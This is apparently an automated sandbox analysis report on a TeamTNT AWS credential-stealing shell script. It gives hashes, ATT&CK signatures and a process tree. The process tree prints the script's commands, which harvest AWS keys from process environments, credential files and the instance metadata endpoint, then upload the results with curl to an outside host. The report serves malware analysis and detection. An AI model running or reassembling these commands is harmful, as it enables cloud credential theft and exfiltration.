317806eaebb1cec9ddb962ef7fa19ee0673a67db3a8c7d650d76885041031ce8

Analysis

max time kernel
148s
max time network
161s
platform
debian-9_mipsel
resource
debian9-mipsel-20240729-en
resource tags

arch:mipselimage:debian9-mipsel-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
29-12-2024 23:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

SugarLogic_#teamtnt_by_@r3dbU7z/AWS.sh
Size

8KB
MD5

572c47986c61bf2fcd7f134299fcd5b2
SHA1

48193cee044078ba308b958cc50a42564c581159
SHA256

af2cf9af17f6db338ba3079b312f182593bad19fab9075a77698f162ce127758
SHA512

97685e6b0fe760342de129905bf05e5a5b6c21cab657b329d6e99c23667c8370ba846c34cd44d543d78f0c793e7641ab94f6761ce439d2c4962e128444ca074c
SSDEEP

96:A40rlQB3tYSQaRqCB4YwSsX9DsGE/D1ElSeU2148WKC2wHyrEGG0benp2GkOQPX1:B6l+425u1/+GK72wHyrEGG0bIp2GiF

Score

6^/10

antivm defense_evasion discovery evasion

Malware Config

Signatures

Enumerates running processes
Discovers information about currently running processes on the system

Reads list of loaded kernel modules 1 TTPs 1 IoCs

Reads the list of currently loaded kernel modules, possibly to detect virtual environments.

evasion

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
File opened for reading	/proc/modules	AWS.sh

Virtualization/Sandbox Evasion: Time Based Evasion 1 TTPs 1 IoCs

Adversaries may detect and evade virtualized environments and sandboxes.

defense_evasion

Time Based Evasion

T1497.003

pid	Process
841	uptime

Checks CPU configuration 1 TTPs 1 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

description	ioc	Process
File opened for reading	/proc/cpuinfo	AWS.sh

Reads CPU attributes 1 TTPs 2 IoCs

discovery

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/online	uptime
File opened for reading	/sys/devices/system/cpu/online	free

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/7	AWS.sh
File opened for reading	/proc/6	AWS.sh
File opened for reading	/proc/10/environ	strings
File opened for reading	/proc/sys/kernel/osrelease	uptime
File opened for reading	/proc/filesystems	free
File opened for reading	/proc/381	AWS.sh
File opened for reading	/proc/17	AWS.sh
File opened for reading	/proc/12/environ	strings
File opened for reading	/proc/21/environ	strings
File opened for reading	/proc/733/environ	strings
File opened for reading	/proc/18	AWS.sh
File opened for reading	/proc/13/environ	strings
File opened for reading	/proc/18/environ	strings
File opened for reading	/proc/732/environ	strings
File opened for reading	/proc/740	AWS.sh
File opened for reading	/proc/10/environ	strings
File opened for reading	/proc/384/environ	strings
File opened for reading	/proc/837/environ	strings
File opened for reading	/proc/37	AWS.sh
File opened for reading	/proc/730/environ	strings
File opened for reading	/proc/6/environ	strings
File opened for reading	/proc/72/environ	strings
File opened for reading	/proc/361	AWS.sh
File opened for reading	/proc/filesystems	AWS.sh
File opened for reading	/proc/14/environ	strings
File opened for reading	/proc/36/environ	strings
File opened for reading	/proc/386/environ	strings
File opened for reading	/proc/78/environ	strings
File opened for reading	/proc/dma	AWS.sh
File opened for reading	/proc/execdomains	AWS.sh
File opened for reading	/proc/device-tree	AWS.sh
File opened for reading	/proc/partitions	AWS.sh
File opened for reading	/proc/interrupts	AWS.sh
File opened for reading	/proc/key-users	AWS.sh
File opened for reading	/proc/softirqs	AWS.sh
File opened for reading	/proc/tty	AWS.sh
File opened for reading	/proc/17/environ	strings
File opened for reading	/proc/681/environ	strings
File opened for reading	/proc/36	AWS.sh
File opened for reading	/proc/24/environ	strings
File opened for reading	/proc/330/environ	strings
File opened for reading	/proc/835	AWS.sh
File opened for reading	/proc/359/environ	strings
File opened for reading	/proc/359	AWS.sh
File opened for reading	/proc/kcore	AWS.sh
File opened for reading	/proc/126/environ	strings
File opened for reading	/proc/bus	AWS.sh
File opened for reading	/proc/2/environ	strings
File opened for reading	/proc/11/environ	strings
File opened for reading	/proc/73/environ	strings
File opened for reading	/proc/8	AWS.sh
File opened for reading	/proc/702/environ	strings
File opened for reading	/proc/731/environ	strings
File opened for reading	/proc/filesystems	sed
File opened for reading	/proc/19/environ	strings
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/732	AWS.sh
File opened for reading	/proc/82	AWS.sh
File opened for reading	/proc/self	AWS.sh
File opened for reading	/proc/net	AWS.sh
File opened for reading	/proc/703/environ	strings
File opened for reading	/proc/732/environ	strings
File opened for reading	/proc/cmdline	AWS.sh
File opened for reading	/proc/36/environ	strings

System Network Configuration Discovery 1 TTPs 1 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
839	curl

/tmp/SugarLogic_#teamtnt_by_@r3dbU7z/AWS.sh
"/tmp/SugarLogic_#teamtnt_by_@r3dbU7z/AWS.sh"
1⤵
- Reads list of loaded kernel modules
- Checks CPU configuration
- Reads runtime system information
PID:733
- /usr/bin/sort
  sort -u
  2⤵
  PID:740
- /bin/grep
  grep "AWS_DEFAULT_REGION\\|AWS_ACCESS_KEY_ID\\|AWS_SECRET_ACCESS_KEY\\|AWS_SESSION_TOKEN"
  2⤵
  PID:741
- /usr/bin/strings
  strings /proc/1/environ /proc/10/environ /proc/11/environ /proc/110/environ /proc/12/environ /proc/126/environ /proc/127/environ /proc/13/environ /proc/14/environ /proc/15/environ /proc/155/environ /proc/16/environ /proc/162/environ /proc/17/environ /proc/178/environ /proc/18/environ /proc/19/environ /proc/2/environ /proc/20/environ /proc/21/environ /proc/22/environ /proc/23/environ /proc/24/environ /proc/245/environ /proc/3/environ /proc/326/environ /proc/327/environ /proc/330/environ /proc/359/environ /proc/36/environ /proc/361/environ /proc/37/environ /proc/381/environ /proc/384/environ /proc/386/environ /proc/4/environ /proc/443/environ /proc/5/environ /proc/6/environ /proc/672/environ /proc/676/environ /proc/680/environ /proc/681/environ /proc/688/environ /proc/7/environ /proc/70/environ /proc/702/environ /proc/703/environ /proc/708/environ /proc/71/environ /proc/72/environ /proc/726/environ /proc/73/environ /proc/730/environ /proc/731/environ /proc/732/environ /proc/733/environ /proc/734/environ /proc/738/environ /proc/739/environ /proc/74/environ /proc/740/environ /proc/741/environ /proc/75/environ /proc/76/environ /proc/77/environ /proc/78/environ /proc/8/environ /proc/81/environ /proc/82/environ /proc/84/environ /proc/9/environ /proc/self/environ /proc/thread-self/environ
  2⤵
  - Reads runtime system information
  PID:739
- /bin/grep
  grep "aws_access_key_id\\|aws_secret_access_key\\|aws_session_token"
  2⤵
  PID:744
- /bin/cat
  cat /root/.aws/credentials
  2⤵
  PID:743
- /bin/grep
  grep "aws_access_key_id\\|aws_secret_access_key\\|aws_session_token"
  2⤵
  PID:747
- /bin/cat
  cat "/home/*/.aws/credentials"
  2⤵
  PID:746
- /bin/grep
  grep AccessKeyId
  2⤵
  PID:750
- /bin/sed
  sed "s/ \"AccessKeyId\" : \"/aws_access_key_id = /g"
  2⤵
  PID:751
- /bin/sed
  sed "s/\",//g"
  2⤵
  - Reads runtime system information
  PID:752
- /usr/bin/curl
  curl -sLk http://169.254.169.254/latest/meta-data/iam/security-credentials/
  2⤵
  PID:754
- /usr/bin/curl
  curl --max-time 13 --connect-timeout 13 -sLk http://169.254.169.254/latest/meta-data/iam/security-credentials/
  2⤵
  PID:749
- /usr/bin/sort
  sort -u
  2⤵
  PID:836
- /bin/grep
  grep AWS
  2⤵
  PID:837
- /usr/bin/strings
  strings /proc/1/environ /proc/10/environ /proc/11/environ /proc/110/environ /proc/12/environ /proc/126/environ /proc/127/environ /proc/13/environ /proc/14/environ /proc/15/environ /proc/155/environ /proc/16/environ /proc/162/environ /proc/17/environ /proc/178/environ /proc/18/environ /proc/19/environ /proc/2/environ /proc/20/environ /proc/21/environ /proc/22/environ /proc/23/environ /proc/24/environ /proc/245/environ /proc/3/environ /proc/326/environ /proc/327/environ /proc/330/environ /proc/359/environ /proc/36/environ /proc/361/environ /proc/37/environ /proc/381/environ /proc/384/environ /proc/386/environ /proc/4/environ /proc/443/environ /proc/5/environ /proc/6/environ /proc/672/environ /proc/676/environ /proc/680/environ /proc/681/environ /proc/688/environ /proc/7/environ /proc/70/environ /proc/71/environ /proc/72/environ /proc/73/environ /proc/730/environ /proc/731/environ /proc/732/environ /proc/733/environ /proc/734/environ /proc/74/environ /proc/75/environ /proc/76/environ /proc/77/environ /proc/78/environ /proc/8/environ /proc/81/environ /proc/82/environ /proc/834/environ /proc/835/environ /proc/836/environ /proc/837/environ /proc/84/environ /proc/9/environ /proc/self/environ /proc/thread-self/environ
  2⤵
  - Reads runtime system information
  PID:835
- /bin/rm
  rm -f /var/tmp/TNT_AWS.txt
  2⤵
  PID:838
- /usr/bin/curl
  curl -sLk ipv4.icanhazip.com
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  PID:839
- /usr/bin/uptime
  uptime
  2⤵
  - Virtualization/Sandbox Evasion: Time Based Evasion
  - Reads CPU attributes
  - Reads runtime system information
  PID:841
- /usr/bin/free
  free -h
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:842
- /usr/bin/who
  who
  2⤵
  PID:843
- /usr/bin/last
  last
  2⤵
  PID:844
- /usr/bin/lastlog
  lastlog
  2⤵
  PID:845
- /bin/cat
  cat /var/tmp/TeamTNT_AWS_STEALER.txt
  2⤵
  PID:846
- /bin/rm
  rm -f /var/tmp/TeamTNT_AWS_STEALER.txt
  2⤵
  PID:847
- /usr/bin/curl
  curl -F "userfile=@/var/tmp/TNT_AWS.txt" http://chimaera.cc/in/AWS.php
  2⤵
  PID:848
- /bin/rm
  rm -f /var/tmp/TNT_AWS.txt
  2⤵
  PID:850

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Time Based Evasion

T1497.003

Credential Access

Discovery

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Time Based Evasion

T1497.003

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/var/tmp/TNT_AWS.txt

Filesize
2KB

MD5
de637c56068c880e0633f4539322d702

SHA1
a6c4f07a020dc6d2f7103649c98b5c8c78a61c3c

SHA256
cab2276f080fe3c5d2ea59c062c70c141c1596194160a9cea042d80acfa2f5eb

SHA512
fa8f3595e99f32c5c373cd19c6676f28e98c378cf35e4d66d6eab84d5e9e1420c08c287357ca68e302cca4ffaaaa99105ac1eca32713561156aa1ae5cd12872f

Download Submit
/var/tmp/TNT_AWS.txt

Filesize
3B

MD5
2228e977ebea8966e27929f43e39cb67

SHA1
7c338ed2840d2bf55f9f5e4eed04f66c80840eb3

SHA256
6a3cf5192354f71615ac51034b3e97c20eda99643fcaf5bbe6d41ad59bd12167

SHA512
ff9f010b5bdd7591d052fdb8cfc6e7b842f8f973ab37a91ea5e16449c17e9278d9f95f265b0508f083348376aeb16d7f02b7b86cde634e8c9f875287049360de

Download Submit
/var/tmp/TNT_AWS.txt

Filesize
6B

MD5
6d93d3216dc4a7f5df47d4876fbec4d3

SHA1
7a0c7e3dd8173007d955db528117071f441c8541

SHA256
d088784b7ecb87f1ea17e6f982fa968ffefcc07b79de6ecc548fc00242868da6

SHA512
36922722671d2bb1d014b55dccb9431196c0f6e00465a28cea54c25027d08b968e7fdde74df9c287d0c9a7d0ebd195acc572d74d0ac7de0fab6e087b9111029c

Download Submit
/var/tmp/TNT_AWS.txt

Filesize
9B

MD5
33f4f15a16a9843faf6a25d4f387b6fd

SHA1
c0d63dddfbc3523608304cc80ef04e521acb685e

SHA256
1e135afb54bf948ed616b7e518ea9f59c8edad95a2d1dfbae8adc60b167c5f6c

SHA512
faa912fb483361fe90e230c2137c8d6fab26c3accb3199b20140810c533bbbb064fa29da385d57494fb7ff95a4f9dbe4969e552c1f08e95a1e3f9bd87478ab54

Download Submit
/var/tmp/TNT_AWS.txt

Filesize
24B

MD5
bada8ac69028f523552233344aaad658

SHA1
72152004db86975d60054164701dc3b73722625a

SHA256
107b0c69822fa8d9cda0a77f9666361b33fb1ce623756236b68ad18885985163

SHA512
49b6fbb7256bb97ebdd442aab4eb77f2a0bd39a5a66ffb1f2587ae195d5f00028fc17239d6f483b888fbb3310b6d738b7aed27105468d7e8b889a1344a76a9bc

Download Submit
/var/tmp/TNT_AWS.txt

Filesize
27B

MD5
6981aaf4c46712e1a32eca38cc264fb1

SHA1
c7d87c76e03b0a2493530d4d9b51cac14b14e295

SHA256
cbb8e4ba86554a6306050e679deccec6b693b2b6dc3616f4f061df067adac5ee

SHA512
ba79e1caf979b59e8dd333dbe0f2c7ace3f4ee7a312914a17734da9975d3b3fb599b417c12719e27662cad1aad591343bbd3225e20048fbf3d440e3e552a1957

Download Submit
/var/tmp/TeamTNT_AWS_STEALER.txt

Filesize
25B

MD5
706262cd6acf8e426902e2131aa76725

SHA1
cb2906e5236dd2720c8517a27c43c19dc79c6a99

SHA256
6b8af17b4b6b1f99fc19b44bd1fe1715290471451dfb701cf5e2fd594d589d9c

SHA512
26edd4bed70d4475d76b59b4572da8fae201fc3e7d54e4a1753aa1e6ab15e22885bc5324cba7ed97a8f5e97bbb3bbc72575ae722381f0e0490475451e6f5fd6c

Download Submit
/var/tmp/TeamTNT_AWS_STEALER.txt

Filesize
50B

MD5
53c4eed3aa0f16c1f34e566e841bb026

SHA1
27fc76586e80661003cdacdea563ced0cf19710f

SHA256
8c32cba969af187b2ab6de8b8c1afcf33f7d36740df6303195c8ae8f807bc147

SHA512
92ecac49852749281bca7803982a0d3b33aebdc16e00662cd5564c10a2f11d8251ca3c3fcf5f2ab33264934489c9cd26734f81e01dd93ed442e4e59b4a5bfe40

Download Submit
/var/tmp/TeamTNT_AWS_STEALER.txt

Filesize
70B

MD5
511befb58daff8bd27aa2507a5048f0e

SHA1
37f4d265a5e9ea6ec6b5d562ea5e46d93e6a6d69

SHA256
5e67c2c5fd5f59c6a56343a80d23fc7ad405d94c2f535a7ed52726e11046141f

SHA512
c83f540583c191552ead7dae449d325166af0448e4a689ae87e57a929a35b5deab6869981ec8afe501266c610340a4bc020e7e9bab995afff9a8aabc982c1a85

Download Submit
/var/tmp/TeamTNT_AWS_STEALER.txt

Filesize
73B

MD5
52348a3bc7381a8237238b44aa62593d

SHA1
92dd9b117dea1e0d1548325143e0a3f408940379

SHA256
67dde48321dbc5d16cddff92ae39b607f7bbafd8ee6d6672ab5a83fd3f76f1e1

SHA512
2e967b0d58ea959343902e1e6041625489796bc5f72758ab660d73e7d9b098f193051c9671c5035ad77cc196a7d13826aac4299bdf5012acc6de7ec136466564

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads